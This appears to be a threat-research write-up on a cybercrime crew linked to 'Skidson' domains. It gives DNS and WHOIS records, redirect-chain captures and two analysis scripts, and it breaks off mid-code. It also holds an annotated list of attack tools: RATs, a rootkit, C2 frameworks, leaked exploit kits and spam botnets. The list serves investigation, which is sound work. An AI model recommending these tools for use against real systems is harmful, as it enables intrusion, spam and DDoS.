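The 5136 record also carries the new attribute value as a security descriptor; comparing the SID inside it with the SID of the freshly created computer account would confirm the link rather than infer it from the shared actor, and that lookup is left out here.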
how to get
[img of i3 for kali]
- sudo apt install i3
- sudo update-alternatives --config x-session-manager
- select i3
- reboot
Interesting idea, but for most people kali is best as a LiveCD that can be destroyed, and i3/sway are best with my own config personally. Also, a reboot is not necessary since you can just execute systemctl restart lightdm.
Apparently using the control code \x0a as a username will be accepted by Discord (UPDATE: not true anymore), but makes a blank username. This was used by a non-core member of said crew.
https://book.hacktricks.xyz/welcome/readme
https://cheatsheetseries.owasp.org/
https://github.com/danielmiessler/SecLists
https://github.com/vavkamil/awesome-bugbounty-tools
dirsearch - best directory busting tool
ffuf - the best http fuzzing tool
httprobe - check alive http servers from a large list
gospider - crawling webservers
assetfinder - passive asset discovery
getallurls - passive url discovery
amass - multi use passive enumeration tool
meg - request many paths in many hosts (like round robin directory busting)
sqlmap - the best sql injection tool
tplmap - like sqlmap but for server side template injection
burpsuite - highly extensible http(s) proxy, includes a lot of useful tools, it's a must-have
nuclei - an actually good automated scanner (like nessus but specialized for web apps and 10x better)
git-dumper - dump exposed .git directories
https://cyberchef.org/ - mess with various data formats and encodings (great tool)
https://check-host.net/ - check availability of hosts, tcp and udp ports, ping, geolocation and more
https://bgp.tools/ - bgp tools
https://bgp.he.net/ - even more bgp tools
https://dehashed.com/ - service to find passwords from breaches
https://www.whoxy.com/ - whois history, reverse whois and other whois tools
crackmapexec - password spraying and service enumeration for many protocols
impacket-getTGT - get kerberos ticket granting ticket to use with other tools
impacket-smbclient - (better) smb client
impacket-psexec - create and run psexec service
impacket-wmiexec - run commands over wmi
impacket-smbexec - execute commands over smb
DonPAPI - dump credentials from dpapi
evil-winrm - windows remoting
bloodhound - visualize active directory attack paths
responder - respond to and poison various windows protocols to grab authentication
WinPeas - windows privilege escalation tool (like linpeas)
powersploit - windows powershell post exploitation module
rubeus - kerberos multi tool
sysinternals - a suite of tools for windows administration
masscan - fast port scanner (async, single syn packet)
zmap - another fast port scanner (async, single syn packet)
nmap - the best port scanning tool with scripting capabilities and accurate service detection
netcat - easily build tcp or udp connections and quick shells
chisel - create socks, http and udp tunnels over http
linpeas - privilege escalation and info gathering script works every time (ok 99% of the time)
linenum - run this if linpeas doesn't give you the sauce
diamorphine - kernel rootkit for process hiding
powershell-empire - c2/post exploitation framework with agents written in powershell (for windows) and python (for linux)
cobalt strike - c2 framework with a lot of AD capabilities built in to the agent
Quasar RAT - open source windows "remote administration" tool
AsyncRAT - open source windows "remote administration" tool
mirai/qbot - ddos c2 for linux
perlbot - irc based c2 for linux
rsync - transfer or synchronize files fast
rclone - upload content to the cloud fast
scp/sftp - upload over ssh tunnel
ftp - upload files over ftp
smbclient - upload files over smb
Google - the most powerful of them all..
doxtool.py - searches a username on countless social media sites and prints matches
maltego - visualize open source data points as a graph and apply transforms to extend them
exiftool - extract exif metadata from files
hashcat - fast hash cracker
john - another fast hash cracker
hydra - fast bruteforcer that supports many protocols
Wyd.pl - generate wordlist from a folder of files and documents belonging to the target user
cupp - generate common user passwords and mutations from a wordlist or interactive prompt
Exploitation Tools:
metasploit - probably the best exploitation framework ever made
armitage - multiplayer red team with a gui frontend for metasploit (it's open source cobalt strike..)
BlackHole - leaked browser exploit kit
BleedingLife - leaked browser exploit kit
CrimePack - leaked browser exploit kit
searchsploit - searches exploitdb from the command line
Scrapebox - scrape links and keywords, emails, pr and much more from search engines, post comments, pingbacks, trackbacks.. swiss army knife of SEO
XRumer - amazing forum spamming tool that's been around for more than a decade and still being actively developed
Xevil - ocr tool that can decode pretty much any captcha in milliseconds, comes with xrumer
allsubmitter - russian multi spam tool
gsa search engine ranker - another good backlink tool
grum - leaked email spam botnet c2
phplist - open source mailing list software
exim - mail transfer agent
postfix - mail transfer agent
x64dbg - great graphical debugger
ollydbg - windows 32 bit graphical debugger
immunitydebugger - a graphical debugger extensible with python
gdb - gnu debugger
pwndbg - pwn extensions for gdb
edb - a graphical debugger for linux
WinDBG - NT OS kernel and userland debugger
IDA - decompiler, debugger and code analysis tool
ghidra - decompiler, debugger and code analysis tool
cheatengine - a tool for developing game hacks that's also really useful for reverse engineering
pwntools - full fledged pwn framework with lots of tools to make exploit development easier
rop-tool - tool for finding rop gadgets
checksec - check which mitigations are enabled on a binary
afl - fast brute force fuzzer with instrumentation
spike - network protocol fuzzer
msfvenom - easily generate shellcode using metasploit framework templates
Not a whole lot other than racist and pro-Russian content. One interesting thing I noticed was that the old style “1337-speak” is no longer a thing, and broken English is not really a thing as much either. It was mostly memes and taking on personas. Some people took on the persona of Pokimane (chakal1337), some Serena Williams (not in a good way), others Al Pacino (Scarface); many common influencers were common choices. This made for very expressive, “reactive” people that were easily memeable and easy to communicate with via GIFs. The way I stayed on was by adopting an identity of my own, and I will keep that identity to myself.
Eventually a link was posted to https://skidson.online/admin.php which provided a ton of other DNS entries.
Description provided of features:
- Page for search engine
- Redirect humans to location
- Custom title & description
- Multiple high DA domains
- Unlimited traffic
- 1% skim
These are some of the more sanitized chat/meme examples:
Arrow/goober meme is a common meme from discord.gg/cats. Coordinates are of Raven Rock Mountain Complex in Pennsylvania:
https://en.wikipedia.org/wiki/Raven_Rock_Mountain_Complex
Redacted the final location, as I’ll be doing a more in-depth analysis of Matrix much later, with over 1GB of raw text from extremist groups (largely not from this crew) to analyze and graph.
Not much was gleaned there anyway, as it was eventually removed. They had a code name for their hidey hole:
But I did manage to coerce a link to it from someone:
My assessment was that I wouldn’t be able to join a server with six members without being figured out, and it would have jeopardized the other extremism research I am still doing.
skidson.online. 300 IN A 172.67.181.198
skidson.online. 300 IN A 104.21.35.252
Domain Name: SKIDSON.ONLINE
Registry Domain ID: D164729351-CNIC
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://cloudflare.com
Updated Date: 2022-01-20T16:10:46.0Z
Creation Date: 2020-01-20T21:13:35.0Z
Registry Expiry Date: 2024-01-20T23:59:59.0Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Skidson
Registrant State/Province: Lisbon
Registrant Country: PT
blackhatseo.win. 297 IN A 104.21.86.207
blackhatseo.win. 297 IN A 172.67.136.208
Registry Domain ID: DC554398F83D34DCE86218FFB922AE69B-GDREG
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: www.cloudflare.com
Updated Date: 2022-09-20T23:59:30Z
Creation Date: 2022-01-22T02:33:23Z
Registry Expiry Date: 2023-01-22T02:33:23Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Skidson
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Lisbon
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: PT
splog.win. 300 IN A 104.21.88.21
splog.win. 300 IN A 172.67.171.249
Domain Name: splog.win
Registry Domain ID: DF4AAD8EE7359417AAE90173EF832CFE0-GDREG
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: www.cloudflare.com
Updated Date: 2022-09-20T22:57:15Z
Creation Date: 2022-02-15T05:00:50Z
Registry Expiry Date: 2023-02-15T05:00:50Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Skidson
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Lisbon
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: PT
feetporn.win. 300 IN A 104.21.3.50
feetporn.win. 300 IN A 172.67.130.64
Domain Name: feetporn.win
Registry Domain ID: DCF7AC62B00DD49518ACA532DE234EC80-GDREG
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: www.cloudflare.com
Updated Date: 2022-09-21T00:45:15Z
Creation Date: 2022-01-19T00:56:56Z
Registry Expiry Date: 2023-01-19T00:56:56Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Skidson
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Lisbon
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: PT
aqw.icu. 300 IN A 172.67.129.37
aqw.icu. 300 IN A 104.21.2.119
Domain Name: AQW.ICU
Registry Domain ID: D316305496-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-09-09T14:52:30.0Z
Creation Date: 2022-08-06T16:14:56.0Z
Registry Expiry Date: 2023-08-06T23:59:59.0Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: See PrivacyGuardian.org
Registrant State/Province: AZ
Registrant Country: US
aqw.monster. 300 IN A 172.67.196.176
aqw.monster. 300 IN A 104.21.52.73
[Querying whois.internic.net]
[whois.internic.net]
No match for domain "AQW.MONSTER".
aqworlds.live. 300 IN A 172.67.140.121
aqworlds.live. 300 IN A 104.21.70.236
[Querying whois.rightside.co]
[whois.rightside.co]
aqworlds.top. 300 IN A 104.21.37.222
aqworlds.top. 300 IN A 172.67.213.234
Domain Name: aqworlds.top
Registry Domain ID: D20220807G10001G_85842468-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-08-06T16:20:30Z
Creation Date: 2022-08-06T16:14:56Z
Registry Expiry Date: 2023-08-06T16:14:56Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
aqworlds.xyz. 300 IN A 172.67.142.194
aqworlds.xyz. 300 IN A 104.21.95.37
Domain Name: AQWORLDS.XYZ
Registry Domain ID: D316305490-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-09-09T14:52:30.0Z
Creation Date: 2022-08-06T16:14:56.0Z
Registry Expiry Date: 2023-08-06T23:59:59.0Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: See PrivacyGuardian.org
Registrant State/Province: AZ
Registrant Country: US
chat-online.top. 300 IN A 172.67.183.203
chat-online.top. 300 IN A 104.21.48.101
Domain Name: chat-online.top
Registry Domain ID: D20220723G10001G_85022334-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-07-22T16:17:08Z
Creation Date: 2022-07-22T16:11:30Z
Registry Expiry Date: 2023-07-22T16:11:30Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
ddos-booter.top. 300 IN A 104.21.38.212
ddos-booter.top. 300 IN A 172.67.168.125
Domain Name: ddos-booter.top
Registry Domain ID: D20230113G10001G_94524448-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2023-01-12T16:16:05Z
Creation Date: 2023-01-12T16:03:29Z
Registry Expiry Date: 2024-01-12T16:03:29Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: PrivacyGuardian.org llc
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
ip-stresser.top. 300 IN A 104.21.77.142
ip-stresser.top. 300 IN A 172.67.208.235
Domain Name: ip-stresser.top
Registry Domain ID: D20230113G10001G_94524450-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2023-01-12T16:17:18Z
Creation Date: 2023-01-12T16:03:31Z
Registry Expiry Date: 2024-01-12T16:03:31Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: PrivacyGuardian.org llc
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
malwarez.top. 300 IN A 172.67.159.163
malwarez.top. 300 IN A 104.21.50.91
Domain Name: malwarez.top
Registry Domain ID: D20221018G10001G_89708920-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-10-18T20:26:31Z
Creation Date: 2022-10-17T17:45:03Z
Registry Expiry Date: 2023-10-17T17:45:03Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: PrivacyGuardian.org llc
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
pornoportugues.top. 300 IN A 172.67.164.98
pornoportugues.top. 300 IN A 104.21.66.213
Domain Name: pornoportugues.top
Registry Domain ID: D20220827G10001G_86946404-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-08-27T00:00:43Z
Creation Date: 2022-08-26T23:53:52Z
Registry Expiry Date: 2023-08-26T23:53:52Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
rootkitz.top. 300 IN A 104.21.71.183
rootkitz.top. 300 IN A 172.67.147.250
Domain Name: rootkitz.top
Registry Domain ID: D20221018G10001G_89708918-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-10-18T20:25:47Z
Creation Date: 2022-10-17T17:45:02Z
Registry Expiry Date: 2023-10-17T17:45:02Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: PrivacyGuardian.org llc
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
search-1337.cfd. 300 IN A 172.67.161.179
search-1337.cfd. 300 IN A 104.21.15.50
Domain Name: SEARCH-1337.CFD
Registry Domain ID: D310075066-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-09-09T14:51:12.0Z
Creation Date: 2022-07-19T16:43:11.0Z
Registry Expiry Date: 2023-07-19T23:59:59.0Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: See PrivacyGuardian.org
Registrant State/Province: AZ
Registrant Country: US
top-product.top. 300 IN A 104.21.84.156
top-product.top. 300 IN A 172.67.194.145
Domain Name: top-product.top
Registry Domain ID: D20220720G10001G_84864269-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-08-06T16:26:49Z
Creation Date: 2022-07-19T20:13:38Z
Registry Expiry Date: 2023-07-19T20:13:38Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
$ curl -i https://skidson.online
HTTP/2 302
date: Sun, 19 Feb 2023 13:08:49 GMT
content-type: text/html; charset=UTF-8
location: https://goshbiopsy.com/r3sbb4ewsf?key=dc45c101cc3c9c62518a9e59c9aa5631
cache-control: no-cache
referrer-policy: no-referrer
cf-cache-status: DYNAMIC
server-timing: cf-q-config;dur=6.0000020312145e-06
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5w87bQMeTS6%2F8lxbj4DON369ZMVlnDi58pDQSrcLiAEpRvAKmtIGpbNVq21il%2FoBmEEyGzp0Qz3060nDnwn%2FQl3uJBfyH4A8xfMCiGKg8aY2FGlF6kfZ0j39ZhpsZQ3HPw%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 79bf3bc36d6d2caf-ORD
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
$ curl -i "https://goshbiopsy.com/r3sbb4ewsf?key=dc45c101cc3c9c62518a9e59c9aa5631"
HTTP/1.1 500 Internal Server Error
Server: nginx/1.17.6
Date: Sun, 19 Feb 2023 13:09:31 GMT
Content-Type: text/html
Content-Length: 177
Connection: close
<html>
<head><title>500 Internal Server Error</title></head>
<body>
<center><h1>500 Internal Server Error</h1></center>
<hr><center>nginx/1.17.6</center>
</body>
</html>
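The two curl captures above were taken without -L on purpose: letting curl follow the 302 would hide that the first hop is Cloudflare-fronted (server: cloudflare, cf-ray ending in the ORD colo code) while the second hop answers from a bare nginx/1.17.6 with a 500. The script below is an added example, not code from the page's author, that replays a captured chain offline and records those per-hop fields. The two responses are embedded as constructed sample input: the headers are the ones shown above (minus the long report-to/nel lines) and the 500 body is truncated; the start URL https://skidson.online is the one the page queried.

```python
"""Replay a captured redirect chain offline and fingerprint each hop."""
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the two curl -i captures above, report-to/nel headers
# dropped and the nginx error body shortened.
HOP_1 = """\
HTTP/2 302
date: Sun, 19 Feb 2023 13:08:49 GMT
content-type: text/html; charset=UTF-8
location: https://goshbiopsy.com/r3sbb4ewsf?key=dc45c101cc3c9c62518a9e59c9aa5631
cache-control: no-cache
referrer-policy: no-referrer
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 79bf3bc36d6d2caf-ORD
"""

HOP_2 = """\
HTTP/1.1 500 Internal Server Error
Server: nginx/1.17.6
Date: Sun, 19 Feb 2023 13:09:31 GMT
Content-Type: text/html
Content-Length: 177
Connection: close

<html>
<head><title>500 Internal Server Error</title></head>
</html>
"""

REDIRECTS = (301, 302, 303, 307, 308)


def parse_response(raw):
    """Split a curl -i capture into (status code, lower-cased header dict, body)."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    status = int(lines[0].split()[1])  # "HTTP/2 302" or "HTTP/1.1 500 Internal Server Error"
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def cf_colo(headers):
    """Colo code carried in cf-ray (e.g. ORD), or None when the hop is not behind Cloudflare."""
    ray = headers.get("cf-ray", "")
    return ray.rsplit("-", 1)[1] if "-" in ray else None


def describe_chain(start_url, captures):
    """Walk the captures in order; each hop records where we were, what answered, where it sent us."""
    hops, url = [], start_url
    for raw in captures:
        status, headers, _ = parse_response(raw)
        location = headers.get("location")
        parts = urlsplit(url)
        hops.append({
            "url": url,
            "host": parts.hostname,
            "status": status,
            "server": headers.get("server"),
            "colo": cf_colo(headers),
            "location": location,
            "query": {k: v[0] for k, v in parse_qs(parts.query).items()},
        })
        if status not in REDIRECTS or not location:
            break  # terminal answer (here the nginx 500); stop replaying
        url = location
    return hops


if __name__ == "__main__":
    for hop in describe_chain("https://skidson.online", [HOP_1, HOP_2]):
        print(hop)
```

Each hop's dict is what you would log as an indicator: the fronting CDN and colo on the first hop, the origin's real server banner on the second, and the per-click key parameter that the redirector tacks onto the target URL.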
goshbiopsy.com. 188 IN A 173.233.139.164
goshbiopsy.com. 188 IN A 173.233.137.60
goshbiopsy.com. 188 IN A 173.233.137.52
goshbiopsy.com. 188 IN A 173.233.137.44
goshbiopsy.com. 188 IN A 173.233.137.36
goshbiopsy.com. 188 IN A 192.243.61.227
goshbiopsy.com. 188 IN A 192.243.61.225
goshbiopsy.com. 188 IN A 192.243.59.20
goshbiopsy.com. 188 IN A 192.243.59.13
goshbiopsy.com. 188 IN A 192.243.59.12
Registry Domain ID: 2637923644_DOMAIN_COM-VRSN
Registrar WHOIS Server: WHOIS.ENOM.COM
Registrar URL: WWW.ENOM.COM
Updated Date: 2022-08-03T09:47:16.00Z
Creation Date: 2021-09-01T01:20:00.00Z
Registrar Registration Expiration Date: 2023-09-01T01:20:14.00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant Street:
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: N/A
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: CZ
NetRange: 173.233.128.0 - 173.233.159.255
CIDR: 173.233.128.0/19
NetName: SERVERS-COM
NetHandle: NET-173-233-128-0-1
Parent: NET173 (NET-173-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS7979
Organization: Servers.com, Inc. (SERVE-105)
RegDate: 2015-06-04
Updated: 2019-07-05
Ref: https://rdap.arin.net/registry/ip/173.233.128.0
OrgName: Servers.com, Inc.
OrgId: SERVE-105
Address: 2777 N. Stemmons Fwy
Address: Suite 1655
City: Dallas
StateProv: TX
PostalCode: 75207
Country: US
RegDate: 2014-10-16
Updated: 2015-02-19
Ref: https://rdap.arin.net/registry/entity/SERVE-105
NetRange: 192.243.48.0 - 192.243.63.255
CIDR: 192.243.48.0/20
NetName: ADVANCEDHOSTERS-NET
NetHandle: NET-192-243-48-0-1
Parent: NET192 (NET-192-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS39572
Organization: Internet Service Solution Corp. (ISSC-11)
RegDate: 2012-10-08
Updated: 2014-03-18
Ref: https://rdap.arin.net/registry/ip/192.243.48.0
OrgName: Internet Service Solution Corp.
OrgId: ISSC-11
Address: 8 Copthall
City: Roseau Valley
StateProv:
PostalCode: 00152
Country: DM
RegDate: 2012-09-24
Updated: 2014-03-18
Comment: http://www.advancedhosters.com
Ref: https://rdap.arin.net/registry/entity/ISSC-11
possible locales: China, Portugal, Czechia, Slovenia, Other
namesilo in Arizona
servers.com in Dallas, Texas
advancedhosters.net in Dominica
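The pivots summarised in the four lines above (one registrar, one privacy proxy, everything parked on Cloudflare) can be pulled out of the dump mechanically, and doing so surfaces one more overlap worth noting: ddos-booter.top and ip-stresser.top were created two seconds apart with registry IDs two apart (94524448 / 94524450), and malwarez.top and rootkitz.top one second apart (89708918 / 89708920), which is what a single scripted or cart-checkout registration looks like. The script below is an added example, not the page's own tooling. It parses records in exactly the flattened shape the page prints them (BIND-style A records followed by WHOIS "Key: Value" lines) and reports shared registrars, Cloudflare-fronted A records, and near-simultaneous registrations. Assumptions: the Cloudflare prefixes are a subset of Cloudflare's published IPv4 list copied in by hand, and the embedded sample is a constructed subset of the records above (fields not needed for the pivot are omitted).

```python
"""Parse the flattened DNS + WHOIS dump above and pivot on shared infrastructure."""
import ipaddress
import re
from datetime import datetime
from itertools import combinations

# Cloudflare IPv4 prefixes covering the 104.21.x / 172.67.x answers above.
# Assumption: a hand-copied subset of Cloudflare's published list, not re-fetched here.
CLOUDFLARE_V4 = [ipaddress.ip_network(n) for n in ("104.16.0.0/13", "104.24.0.0/14", "172.64.0.0/13")]

A_RECORD = re.compile(r"^(\S+)\s+\d+\s+IN\s+A\s+(\d+(?:\.\d+){3})$")   # name. TTL IN A addr
KV_LINE = re.compile(r"^([A-Za-z][A-Za-z /]+):\s*(.*)$")              # WHOIS "Key: Value"
TIMESTAMP = re.compile(r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}")          # tolerates .0Z / .00Z
REGISTRY_ID = re.compile(r"(\d+)-([A-Za-z]+)$")                        # ..._94524448-top

# Constructed sample: the fields this script needs, copied from the records above.
SAMPLE = """\
ddos-booter.top. 300 IN A 104.21.38.212
ddos-booter.top. 300 IN A 172.67.168.125
Domain Name: ddos-booter.top
Registry Domain ID: D20230113G10001G_94524448-top
Creation Date: 2023-01-12T16:03:29Z
Registrar IANA ID: 1479
ip-stresser.top. 300 IN A 104.21.77.142
ip-stresser.top. 300 IN A 172.67.208.235
Domain Name: ip-stresser.top
Registry Domain ID: D20230113G10001G_94524450-top
Creation Date: 2023-01-12T16:03:31Z
Registrar IANA ID: 1479
malwarez.top. 300 IN A 172.67.159.163
malwarez.top. 300 IN A 104.21.50.91
Domain Name: malwarez.top
Registry Domain ID: D20221018G10001G_89708920-top
Creation Date: 2022-10-17T17:45:03Z
Registrar IANA ID: 1479
rootkitz.top. 300 IN A 104.21.71.183
rootkitz.top. 300 IN A 172.67.147.250
Domain Name: rootkitz.top
Registry Domain ID: D20221018G10001G_89708918-top
Creation Date: 2022-10-17T17:45:02Z
Registrar IANA ID: 1479
goshbiopsy.com. 188 IN A 173.233.139.164
Creation Date: 2021-09-01T01:20:00.00Z
Registrar IANA ID: 48
"""


def parse_records(text):
    """Group the dump into {domain: {"a": [addresses], "whois": {key: value}}}.
    An A record or "Domain Name:" line selects the current domain; WHOIS lines seen
    before any domain is known (like the stray line the dump opens with) are dropped."""
    records, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = A_RECORD.match(line)
        if m:
            current = m.group(1).rstrip(".").lower()
            records.setdefault(current, {"a": [], "whois": {}})["a"].append(m.group(2))
            continue
        m = KV_LINE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Domain Name":
            current = value.lower()  # registries differ in case (SEARCH-1337.CFD)
            records.setdefault(current, {"a": [], "whois": {}})
        if current is not None:
            records[current]["whois"][key] = value
    return records


def is_cloudflare(address):
    return any(ipaddress.ip_address(address) in net for net in CLOUDFLARE_V4)


def creation_time(whois):
    m = TIMESTAMP.search(whois.get("Creation Date", ""))
    return datetime.strptime(m.group(0), "%Y-%m-%dT%H:%M:%S") if m else None


def registry_id(whois):
    """(numeric id, registry label); ids are only comparable within one registry."""
    m = REGISTRY_ID.search(whois.get("Registry Domain ID", ""))
    return (int(m.group(1)), m.group(2).lower()) if m else None


def find_batches(records, window_s=60):
    """Pairs registered in the same registry within window_s: (a, b, seconds apart, id gap)."""
    hits = []
    for a, b in combinations(sorted(records), 2):
        ta, tb = creation_time(records[a]["whois"]), creation_time(records[b]["whois"])
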